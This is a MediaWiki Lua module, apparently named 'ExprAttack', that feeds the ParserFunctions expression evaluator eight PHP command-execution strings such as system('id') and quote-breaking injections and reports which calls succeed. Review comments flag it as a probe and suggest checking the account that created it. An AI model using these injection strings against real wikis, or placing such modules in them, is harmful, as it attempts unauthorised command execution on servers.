模块:ExprAttack



--- Scribunto module that feeds a fixed list of strings to the
-- ParserFunctions `expr` Lua binding and reports how each call ended.
--
-- NOTE(review): every string in the list is shaped like a PHP
-- command-execution call, so this module is a probe of the expression
-- evaluator, not ordinary template logic. Finding it on a wiki is a reason
-- to look at the page history and the account that created it.
local p = {}

--- Run every probe string through `expr` and summarise the outcomes.
-- Each call goes through `pcall`, so an error raised by `expr` is caught and
-- recorded as "false"; the error message itself is discarded.
-- NOTE(review): `expr` is presumably the arithmetic evaluator behind
-- `#expr`, in which case these strings should be rejected as malformed
-- expressions and every entry should read "=false" - confirm against the
-- installed ParserFunctions version.
-- @treturn string "no_expr" when the binding is unavailable, otherwise the
--   entries "<probe, first 30 chars>=<true|false>[:<result, first 100 chars>]"
--   joined with " | ".
function p.test()
    local parser_functions = mw.ext.ParserFunctions
    if not (parser_functions and parser_functions.expr) then
        return "no_expr"
    end

    -- Fixed probe strings; none is derived from request or page input.
    local probes = {
        "system('id')",
        "eval('system', 'id')",
        "exec('id')",
        "shell_exec('id')",
        "passthru('id')",
        "popen('id', 'r')",
        "' . system('id') . '",
        "'+system('id')+'",
    }

    local report = {}
    for index = 1, #probes do
        local probe = probes[index]
        local succeeded, value = pcall(parser_functions.expr, probe)
        local outcome = tostring(succeeded)
        -- A returned value is appended only for calls that did not raise.
        if succeeded and value then
            outcome = outcome .. ":" .. string.sub(tostring(value), 1, 100)
        end
        report[index] = string.sub(probe, 1, 30) .. "=" .. outcome
    end

    return table.concat(report, " | ")
end

return p